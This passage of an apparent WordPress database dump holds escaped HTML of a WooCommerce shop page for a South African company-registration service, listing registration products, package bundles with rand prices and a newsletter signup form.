class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Change in Address\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Change in Close Corporation Address</span>\n	</a>\n\n	\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;450.00</span>\n	</li>\n</ul></div> <!-- end .et_pb_widget --><div id=\"woocommerce_top_rated_products-2\" class=\"et_pb_widget woocommerce widget_top_rated_products\"><h4 class=\"widgettitle\">Top Rated Products</h4><ul class=\"product_list_widget\"><li>\n	\n	<a href=\"https://companyregistration.online/shop/combo-deals/business-pro/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-100x100.gif 100w, https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-150x150.gif 150w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Business Pro</span>\n	</a>\n\n				\n	<del><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;8,298.00</span></del> <ins><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;5,999.00</span></ins>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/tax-registration/vat-registration/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Vat Registration\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">VAT Registration</span>\n	</a>\n\n				\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;3,500.00</span>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/business-tools/zoho-cloud-accounting-annually/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-150x150.gif 150w, https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-300x300.gif 300w, https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-510x510.gif 510w, https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-100x100.gif 100w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Zoho Books Cloud Accounting Annual</span>\n	</a>\n\n				\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;990.00</span>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-400x400.jpg\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-400x400.jpg 400w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-510x510.jpg 510w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-100x100.jpg 100w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-150x150.jpg 150w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-300x300.jpg 300w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-200x200.jpg 200w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-450x450.jpg 450w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover.jpg 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Private Company - Owner Managed</span>\n	</a>\n\n				\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;750.00</span>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/tax-registration/income-tax-registration/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Income tax registration\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Business Income Tax Registration</span>\n	</a>\n\n				\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;150.00</span>\n	</li>\n</ul></div> <!-- end .et_pb_widget -->\n			</div> <!-- .et_pb_widget_area -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_10 et_pb_with_background et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_15\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_32    et_pb_css_mix_blend_mode_passthrough et_pb_column_empty\">\n				\n				\n				\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_33    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_signup_0 et_animated et_hover_enabled et_pb_newsletter_layout_left_right et_pb_newsletter et_pb_subscribe clearfix et_pb_bg_layout_light  et_pb_text_align_center\">\n				\n				\n				<div class=\"et_pb_newsletter_description\">\n					<h2 class=\"et_pb_module_header\">Join Our Newsletter</h2>\n					We Promise We Wont Spam\n				</div>\n				\n				<div class=\"et_pb_newsletter_form\">\n					<form method=\"post\">\n						<div class=\"et_pb_newsletter_result et_pb_newsletter_error\"></div>\n						<div class=\"et_pb_newsletter_result et_pb_newsletter_success\">\n							<h2>Success!</h2>\n						</div>\n						<div class=\"et_pb_newsletter_fields\">\n							\n					<p class=\"et_pb_newsletter_field et_pb_contact_field_last et_pb_contact_field_last_tablet et_pb_contact_field_last_phone\">\n						<label class=\"et_pb_contact_form_label\" for=\"et_pb_signup_firstname\" style=\"display: none;\">Name</label>\n						<input id=\"et_pb_signup_firstname\" class=\"input\" type=\"text\" placeholder=\"Name\" name=\"et_pb_signup_firstname\">\n					</p>\n							\n							\n					<p class=\"et_pb_newsletter_field et_pb_contact_field_last et_pb_contact_field_last_tablet et_pb_contact_field_last_phone\">\n						<label class=\"et_pb_contact_form_label\" for=\"et_pb_signup_email\" style=\"display: none;\">Email</label>\n						<input id=\"et_pb_signup_email\" class=\"input\" type=\"text\" placeholder=\"Email\" name=\"et_pb_signup_email\">\n					</p>\n							\n							\n					<p class=\"et_pb_newsletter_button_wrap\">\n						<a class=\"et_pb_newsletter_button et_pb_button et_pb_custom_button_icon\" href=\"#\" data-icon=\"&#x24;\">\n							<span class=\"et_subscribe_loader\"></span>\n							<span class=\"et_pb_newsletter_button_text\">Subscribe</span>\n						</a>\n					</p>\n							\n						</div>\n						\n						<input type=\"hidden\" value=\"mailchimp\" name=\"et_pb_signup_provider\" />\n						<input type=\"hidden\" value=\"03dac884f0\" name=\"et_pb_signup_list_id\" />\n						<input type=\"hidden\" value=\"SlavaET\" name=\"et_pb_signup_account_name\" />\n						<input type=\"hidden\" value=\"true\" name=\"et_pb_signup_ip_address\" />\n					</form>\n				</div>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_34    et_pb_css_mix_blend_mode_passthrough et_pb_column_empty\">\n				\n				\n				\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n<span class=\"et_bloom_bottom_trigger\"></span>'),(16665,27942,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_11 kb-zoomout et_pb_with_background et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_16\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_35    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_cta_10 et_hover_enabled et_pb_promo et_pb_bg_layout_dark  et_pb_text_align_center et_pb_no_bg\">\n				\n				\n				<div class=\"et_pb_promo_description\">\n					<h2 class=\"et_pb_module_header\">Owner Managed Business</h2>\n					<p>&nbsp;</p>\n<p>Business owners who will manage the company</p>\n<p>&nbsp;</p>\n				</div>\n				<div class=\"et_pb_button_wrapper\"><a class=\"et_pb_button et_pb_custom_button_icon et_pb_promo_button\" href=\"#\" data-icon=\"&#xe0ef;\">Start Here</a></div>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_36    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_cta_11 et_hover_enabled et_pb_promo et_pb_bg_layout_dark  et_pb_text_align_center et_pb_no_bg\">\n				\n				\n				<div class=\"et_pb_promo_description\">\n					<h2 class=\"et_pb_module_header\">Owner Managed Business</h2>\n					<p>&nbsp;</p>\n<p>Business owners who will manage the company</p>\n<p>&nbsp;</p>\n				</div>\n				<div class=\"et_pb_button_wrapper\"><a class=\"et_pb_button et_pb_custom_button_icon et_pb_promo_button\" href=\"#\" data-icon=\"&#xe0ef;\">Start Here</a></div>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_37    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_cta_12 et_hover_enabled et_pb_promo et_pb_bg_layout_dark  et_pb_text_align_center et_pb_no_bg\">\n				\n				\n				<div class=\"et_pb_promo_description\">\n					<h2 class=\"et_pb_module_header\">Owner Managed Business</h2>\n					<p>&nbsp;</p>\n<p>Business owners who will manage the company</p>\n<p>&nbsp;</p>\n				</div>\n				<div class=\"et_pb_button_wrapper\"><a class=\"et_pb_button et_pb_custom_button_icon et_pb_promo_button\" href=\"#\" data-icon=\"&#xe0ef;\">Start Here</a></div>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_12 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_17 et_pb_row_fullwidth\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_38    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_3 et_pb_bg_layout_light  et_pb_text_align_center  et_pb_blurb_position_top\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><a href=\"https://companyregistration.online/shop/bundled-products/basic-bundle/\"><span class=\"et_pb_image_wrap\"><img src=\"https://companyregistration.online/wp-content/uploads/2017/06/gift-bag-template.gif\" alt=\"business pro box bundle\" class=\"et-waypoint et_pb_animation_bottom\" /></span></a></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><a href=\"https://companyregistration.online/shop/bundled-products/basic-bundle/\">Standard Package</a></h4>\n						<div class=\"et_pb_blurb_description\">\n							<p>Income Tax registration<br />\nName reservation<br />\nCompany registration<br />\nTax Clearance<br />\nBEE Affidavit</p>\n						</div><!-- .et_pb_blurb_description -->\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_39    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_4 et_pb_bg_layout_light  et_pb_text_align_center  et_pb_blurb_position_top\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><a href=\"https://companyregistration.online/shop/bundled-products/gold-bundle/\"><span class=\"et_pb_image_wrap\"><img src=\"https://companyregistration.online/wp-content/uploads/2017/06/gift-bag-template.gif\" alt=\"business pro box bundle\" class=\"et-waypoint et_pb_animation_bottom\" /></span></a></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><a href=\"https://companyregistration.online/shop/bundled-products/gold-bundle/\">Gold Package</a></h4>\n						<div class=\"et_pb_blurb_description\">\n							<p>Income Tax registration<br />\nName reservation<br />\nCompany registration<br />\nTax Clearance<br />\nBEE Affidavit<br />\nShare Certificate<br />\nShare register</p>\n						</div><!-- .et_pb_blurb_description -->\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_40    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_5 et_pb_bg_layout_light  et_pb_text_align_center  et_pb_blurb_position_top\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><a href=\"https://companyregistration.online/shop/bundled-products/tender-ready/\"><span class=\"et_pb_image_wrap\"><img src=\"https://companyregistration.online/wp-content/uploads/2017/06/gift-bag-template.gif\" alt=\"business pro box bundle\" class=\"et-waypoint et_pb_animation_bottom\" /></span></a></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><a href=\"https://companyregistration.online/shop/bundled-products/tender-ready/\">Tender Ready Package</a></h4>\n						<div class=\"et_pb_blurb_description\">\n							<p>Income Tax registration<br />\nName reservation<br />\nCompany registration<br />\nTax Clearance<br />\nBEE Affidavit<br />\nShare Certificate<br />\nShare register<br />\nVat registration</p>\n						</div><!-- .et_pb_blurb_description -->\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_41    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_6 et_pb_bg_layout_light  et_pb_text_align_center  et_pb_blurb_position_top\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><a href=\"https://companyregistration.online/shop/bundled-products/business-pro/\"><span class=\"et_pb_image_wrap\"><img src=\"https://companyregistration.online/wp-content/uploads/2017/06/gift-bag-template.gif\" alt=\"business pro box bundle\" class=\"et-waypoint et_pb_animation_bottom\" /></span></a></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><a href=\"https://companyregistration.online/shop/bundled-products/business-pro/\">Business Pro Package</a></h4>\n						<div class=\"et_pb_blurb_description\">\n							<p>Income Tax registration<br />\nName reservation<br />\nCompany registration<br />\nTax Clearance<br />\nBEE Affidavit<br />\nShare Certificate<br />\nShare register<br />\nVat registration<br />\nPAYE registration</p>\n						</div><!-- .et_pb_blurb_description -->\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_18 et_pb_row_fullwidth\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_42    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_button_module_wrapper et_pb_button_9_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_9 et_hover_enabled et_pb_bg_layout_light\" href=\"https://companyregistration.online/shop/bundled-products/basic-bundle/\" data-icon=\"&#xe0ef;\">Show Me More</a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_43    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_button_module_wrapper et_pb_button_10_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_10 et_hover_enabled et_pb_bg_layout_light\" href=\"https://companyregistration.online/shop/bundled-products/gold-bundle/\" data-icon=\"&#xe0ef;\">Show Me More</a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_44    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_button_module_wrapper et_pb_button_11_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_11 et_hover_enabled et_pb_bg_layout_light\" href=\"https://companyregistration.online/shop/bundled-products/tender-ready/\" data-icon=\"&#xe0ef;\">Show Me More</a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_45    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_button_module_wrapper et_pb_button_12_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_12 et_hover_enabled et_pb_bg_layout_light\" href=\"https://companyregistration.online/shop/bundled-products/business-pro/\" data-icon=\"&#xe0ef;\">Show Me More</a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_13 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_19 et_pb_row_fullwidth\">\n				<div class=\"et_pb_column et_pb_column_2_3 et_pb_column_46    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_shop et_pb_shop_0 \">\n				\n				\n				<div class=\"woocommerce columns-4 \"><ul class=\"products columns-4\">\n<li class=\"product type-product post-28 status-publish first instock product_cat-company-registration product_tag-company-registration product_tag-new-company product_tag-private-company has-post-thumbnail featured virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-400x400.jpg\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-400x400.jpg 400w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-510x510.jpg 510w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-100x100.jpg 100w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-150x150.jpg 150w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-300x300.jpg 300w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-200x200.jpg 200w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-450x450.jpg 450w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover.jpg 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Private Company &#8211; Owner Managed</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;750.00</span></span>\n</a></li>\n<li class=\"product type-product post-30118 status-publish instock product_cat-company-registration product_tag-non-profit has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/company-registration/non-profit-organization/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2019/06/non-profit-organisation-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2019/06/non-profit-organisation-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2019/06/non-profit-organisation-150x150.gif 150w, https://companyregistration.online/wp-content/uploads/2019/06/non-profit-organisation-300x300.gif 300w, https://companyregistration.online/wp-content/uploads/2019/06/non-profit-organisation-510x510.gif 510w, https://companyregistration.online/wp-content/uploads/2019/06/non-profit-organisation-100x100.gif 100w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Non Profit Organization</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;1,999.00</span></span>\n</a></li>\n<li class=\"product type-product post-64 status-publish instock product_cat-company-registration product_tag-accountant product_tag-doctor product_tag-lawyer product_tag-personal-liability product_tag-professional has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Personal Liability Company\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Personal Liability Company</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;2,250.00</span></span>\n</a></li>\n<li class=\"product type-product post-62 status-publish last instock product_cat-company-registration product_tag-change-rights product_tag-customised-moi product_tag-private-company has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Private Company registration customised MOI\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Private Company customised MOI</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;4,650.00</span></span>\n</a></li>\n</ul>\n</div>\n			</div><div class=\"et_pb_module et_pb_shop et_pb_shop_1 \">\n				\n				\n				<div class=\"woocommerce columns-4 \"><ul class=\"products columns-4\">\n<li class=\"product type-product post-70 status-publish first instock product_cat-maintaning-our-company product_tag-annual product_tag-close-corporation product_tag-company product_tag-returns has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/maintaning-our-company/annual-returns/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns-400x400.jpg\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Annual Returns\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns-400x400.jpg 400w, https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns-510x510.jpg 510w, https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns-100x100.jpg 100w, https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns-150x150.jpg 150w, https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns-300x300.jpg 300w, https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns-200x200.jpg 200w, https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns-450x450.jpg 450w, https://companyregistration.online/wp-content/uploads/2016/04/Annual-Returns.jpg 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Annual Returns</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;450.00</span></span>\n</a></li>\n<li class=\"product type-product post-28088 status-publish instock product_cat-combo-deals product_tag-bee-affidavit product_tag-company-registration product_tag-income-tax-registration product_tag-name-reservation product_tag-tax-clearance has-post-thumbnail sale sold-individually shipping-taxable purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/combo-deals/basic-bundle/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\">\n	<span class=\"onsale\">Sale!</span>\n<span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-Standard-Box-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-Standard-Box-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2017/07/BB-Standard-Box-100x100.gif 100w, https://companyregistration.online/wp-content/uploads/2017/07/BB-Standard-Box-150x150.gif 150w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Basic Bundle</h2>\n	<span class=\"price\"><del><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;1,399.00</span></del> <ins><span 